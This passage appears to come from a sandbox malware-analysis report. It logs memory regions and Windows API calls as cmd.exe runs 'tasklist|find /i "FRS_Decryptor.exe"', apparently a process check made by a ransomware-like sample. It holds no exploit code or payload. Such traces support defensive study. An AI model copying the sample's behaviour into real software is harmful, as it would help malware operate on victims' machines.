entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2215 start_va = 0x4f0000 end_va = 0x4fefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 2216 start_va = 0x500000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2217 start_va = 0x540000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2218 start_va = 0x640000 end_va = 0x643fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 2219 start_va = 0x650000 end_va = 0x650fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2220 start_va = 0x660000 end_va = 0x661fff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 2221 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2222 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2223 start_va = 0x7eb80000 end_va = 0x7eba2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eb80000" filename = "" Region: id = 2224 start_va = 0x7ebab000 end_va = 0x7ebadfff entry_point = 0x0 region_type = private name = "private_0x000000007ebab000" filename = "" Region: id = 2225 start_va = 0x7ebae000 end_va = 0x7ebaefff entry_point = 0x0 region_type = private name = "private_0x000000007ebae000" filename = "" Region: id = 2226 start_va = 0x7ebaf000 end_va = 0x7ebaffff entry_point = 0x0 region_type = private name = "private_0x000000007ebaf000" filename = "" Region: id = 2227 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2228 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2229 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2230 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 2231 start_va = 0x800000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 2232 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2233 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2234 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2235 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2236 start_va = 0x670000 end_va = 0x6edfff entry_point = 0x670000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2237 start_va = 0x770000 end_va = 0x77ffff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 2238 start_va = 0x8c0000 end_va = 0x9bffff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 2239 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2240 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2241 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2242 start_va = 0x7ea80000 end_va = 0x7eb7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea80000" filename = "" Region: id = 2243 start_va = 0x4d0000 end_va = 0x4d3fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2244 start_va = 0x9c0000 end_va = 0xc94fff entry_point = 0x9c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2263 start_va = 0x4e0000 end_va = 0x4e3fff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Thread: id = 94 os_tid = 0x8a4 [0070.476] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0070.476] __set_app_type (_Type=0x1) [0070.476] __p__fmode () returned 0x76ea1768 [0070.476] __p__commode () returned 0x76ea176c [0070.476] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0070.476] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0070.476] GetCurrentThreadId () returned 0x8a4 [0070.476] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8a4) returned 0x34 [0070.476] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0070.476] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0070.476] SetThreadUILanguage (LangId=0x0) returned 0x409 [0070.478] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0070.478] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x63f790 | out: phkResult=0x63f790*=0x0) returned 0x2 [0070.478] VirtualQuery (in: lpAddress=0x63f79f, lpBuffer=0x63f738, dwLength=0x1c | out: lpBuffer=0x63f738*(BaseAddress=0x63f000, AllocationBase=0x540000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0070.478] VirtualQuery (in: lpAddress=0x540000, lpBuffer=0x63f738, dwLength=0x1c | out: lpBuffer=0x63f738*(BaseAddress=0x540000, AllocationBase=0x540000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0070.478] VirtualQuery (in: lpAddress=0x541000, lpBuffer=0x63f738, dwLength=0x1c | out: lpBuffer=0x63f738*(BaseAddress=0x541000, AllocationBase=0x540000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0070.478] VirtualQuery (in: lpAddress=0x543000, lpBuffer=0x63f738, dwLength=0x1c | out: lpBuffer=0x63f738*(BaseAddress=0x543000, AllocationBase=0x540000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0070.478] VirtualQuery (in: lpAddress=0x640000, lpBuffer=0x63f738, dwLength=0x1c | out: lpBuffer=0x63f738*(BaseAddress=0x640000, AllocationBase=0x640000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0070.478] GetConsoleOutputCP () returned 0x1b5 [0070.479] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0070.479] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0070.479] _get_osfhandle (_FileHandle=1) returned 0x2f0 [0070.479] SetConsoleMode (hConsoleHandle=0x2f0, dwMode=0x0) returned 0 [0070.479] _get_osfhandle (_FileHandle=1) returned 0x2f0 [0070.479] GetConsoleMode (in: hConsoleHandle=0x2f0, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0070.479] _get_osfhandle (_FileHandle=0) returned 0x24 [0070.479] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0070.479] GetEnvironmentStringsW () returned 0x8c40c0* [0070.479] FreeEnvironmentStringsA (penv="=") returned 1 [0070.479] GetEnvironmentStringsW () returned 0x8c40c0* [0070.479] FreeEnvironmentStringsA (penv="=") returned 1 [0070.479] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x63e6e0 | out: phkResult=0x63e6e0*=0x44) returned 0x0 [0070.480] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x63e6e8, lpData=0x63e6ec, lpcbData=0x63e6e4*=0x1000 | out: lpType=0x63e6e8*=0x0, lpData=0x63e6ec*=0x0, lpcbData=0x63e6e4*=0x1000) returned 0x2 [0070.480] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x63e6e8, lpData=0x63e6ec, lpcbData=0x63e6e4*=0x1000 | out: lpType=0x63e6e8*=0x4, lpData=0x63e6ec*=0x1, lpcbData=0x63e6e4*=0x4) returned 0x0 [0070.480] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x63e6e8, lpData=0x63e6ec, lpcbData=0x63e6e4*=0x1000 | out: lpType=0x63e6e8*=0x0, lpData=0x63e6ec*=0x1, lpcbData=0x63e6e4*=0x1000) returned 0x2 [0070.480] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x63e6e8, lpData=0x63e6ec, lpcbData=0x63e6e4*=0x1000 | out: lpType=0x63e6e8*=0x4, lpData=0x63e6ec*=0x0, lpcbData=0x63e6e4*=0x4) returned 0x0 [0070.480] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x63e6e8, lpData=0x63e6ec, lpcbData=0x63e6e4*=0x1000 | out: lpType=0x63e6e8*=0x4, lpData=0x63e6ec*=0x40, lpcbData=0x63e6e4*=0x4) returned 0x0 [0070.480] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x63e6e8, lpData=0x63e6ec, lpcbData=0x63e6e4*=0x1000 | out: lpType=0x63e6e8*=0x4, lpData=0x63e6ec*=0x40, lpcbData=0x63e6e4*=0x4) returned 0x0 [0070.480] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x63e6e8, lpData=0x63e6ec, lpcbData=0x63e6e4*=0x1000 | out: lpType=0x63e6e8*=0x0, lpData=0x63e6ec*=0x40, lpcbData=0x63e6e4*=0x1000) returned 0x2 [0070.480] RegCloseKey (hKey=0x44) returned 0x0 [0070.480] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x63e6e0 | out: phkResult=0x63e6e0*=0x44) returned 0x0 [0070.480] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x63e6e8, lpData=0x63e6ec, lpcbData=0x63e6e4*=0x1000 | out: lpType=0x63e6e8*=0x0, lpData=0x63e6ec*=0x40, lpcbData=0x63e6e4*=0x1000) returned 0x2 [0070.480] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x63e6e8, lpData=0x63e6ec, lpcbData=0x63e6e4*=0x1000 | out: lpType=0x63e6e8*=0x4, lpData=0x63e6ec*=0x1, lpcbData=0x63e6e4*=0x4) returned 0x0 [0070.480] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x63e6e8, lpData=0x63e6ec, lpcbData=0x63e6e4*=0x1000 | out: lpType=0x63e6e8*=0x0, lpData=0x63e6ec*=0x1, lpcbData=0x63e6e4*=0x1000) returned 0x2 [0070.480] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x63e6e8, lpData=0x63e6ec, lpcbData=0x63e6e4*=0x1000 | out: lpType=0x63e6e8*=0x4, lpData=0x63e6ec*=0x0, lpcbData=0x63e6e4*=0x4) returned 0x0 [0070.480] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x63e6e8, lpData=0x63e6ec, lpcbData=0x63e6e4*=0x1000 | out: lpType=0x63e6e8*=0x4, lpData=0x63e6ec*=0x9, lpcbData=0x63e6e4*=0x4) returned 0x0 [0070.480] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x63e6e8, lpData=0x63e6ec, lpcbData=0x63e6e4*=0x1000 | out: lpType=0x63e6e8*=0x4, lpData=0x63e6ec*=0x9, lpcbData=0x63e6e4*=0x4) returned 0x0 [0070.480] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x63e6e8, lpData=0x63e6ec, lpcbData=0x63e6e4*=0x1000 | out: lpType=0x63e6e8*=0x0, lpData=0x63e6ec*=0x9, lpcbData=0x63e6e4*=0x1000) returned 0x2 [0070.480] RegCloseKey (hKey=0x44) returned 0x0 [0070.480] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa50071 [0070.480] srand (_Seed=0x5aa50071) [0070.480] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0070.480] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0070.480] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0070.480] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x8c40c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0070.480] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0070.480] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0070.481] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0070.481] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0070.481] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0070.481] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0070.481] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0070.481] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0070.481] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0070.481] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0070.481] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0070.481] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0070.481] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0070.481] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x63f4c0 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0070.481] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x63f4c0, lpFilePart=0x63f4bc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x63f4bc*="Desktop") returned 0x1c [0070.481] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0070.481] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x63f238 | out: lpFindFileData=0x63f238) returned 0x8c42d8 [0070.481] FindClose (in: hFindFile=0x8c42d8 | out: hFindFile=0x8c42d8) returned 1 [0070.481] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x63f238 | out: lpFindFileData=0x63f238) returned 0x8c42d8 [0070.481] FindClose (in: hFindFile=0x8c42d8 | out: hFindFile=0x8c42d8) returned 1 [0070.481] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0070.481] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x63f238 | out: lpFindFileData=0x63f238) returned 0x8c42d8 [0070.481] FindClose (in: hFindFile=0x8c42d8 | out: hFindFile=0x8c42d8) returned 1 [0070.482] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0070.482] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0070.482] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0070.482] GetEnvironmentStringsW () returned 0x8c6190* [0070.482] FreeEnvironmentStringsA (penv="=") returned 1 [0070.482] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0070.482] GetConsoleOutputCP () returned 0x1b5 [0070.482] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0070.482] GetUserDefaultLCID () returned 0x409 [0070.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0070.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x63f5ec, cchData=128 | out: lpLCData="0") returned 2 [0070.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x63f5ec, cchData=128 | out: lpLCData="0") returned 2 [0070.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x63f5ec, cchData=128 | out: lpLCData="1") returned 2 [0070.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0070.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0070.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0070.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0070.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0070.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0070.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0070.483] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0070.483] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0070.483] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0070.483] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0070.484] GetConsoleTitleW (in: lpConsoleTitle=0x8c4e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0070.485] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0070.485] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0070.485] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0070.485] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0070.486] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0070.486] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0070.486] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0070.486] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0070.486] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0070.486] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0070.486] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0070.486] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0070.486] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0070.486] _wcsicmp (_String1="IF", _String2="find") returned 3 [0070.486] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0070.486] _wcsicmp (_String1="REM", _String2="find") returned 12 [0070.486] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0070.487] _pipe (in: _PtHandles=0x8c51f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x8c51f0) returned 0 [0070.487] _dup (_FileHandle=1) returned 5 [0070.487] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0070.487] _close (_FileHandle=4) returned 0 [0070.488] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0070.488] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0070.488] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0070.488] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0070.488] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0070.488] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0070.488] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0070.488] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0070.488] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0070.488] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0070.488] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0070.488] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0070.488] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0070.488] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0070.488] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0070.488] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0070.488] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0070.488] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0070.488] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0070.488] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0070.488] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0070.488] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0070.488] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0070.488] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0070.488] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0070.488] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0070.488] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0070.488] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0070.488] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0070.488] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0070.488] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0070.488] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0070.488] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0070.488] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0070.488] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0070.489] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0070.489] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0070.489] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0070.489] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0070.489] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0070.489] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0070.489] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0070.489] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0070.489] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0070.489] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0070.489] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0070.489] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0070.489] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0070.489] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0070.489] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0070.489] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0070.489] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0070.489] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0070.489] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0070.489] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0070.489] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0070.489] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0070.489] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0070.489] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0070.489] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0070.489] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0070.489] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0070.489] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0070.489] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0070.489] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0070.489] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0070.489] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0070.489] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0070.489] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0070.489] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0070.489] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0070.489] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0070.489] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0070.489] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0070.489] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0070.489] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0070.489] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0070.489] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0070.489] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0070.489] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0070.489] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0070.489] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0070.490] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0070.490] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0070.490] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0070.490] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0070.490] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0070.490] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0070.490] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0070.490] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0070.490] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0070.490] _wcsicmp 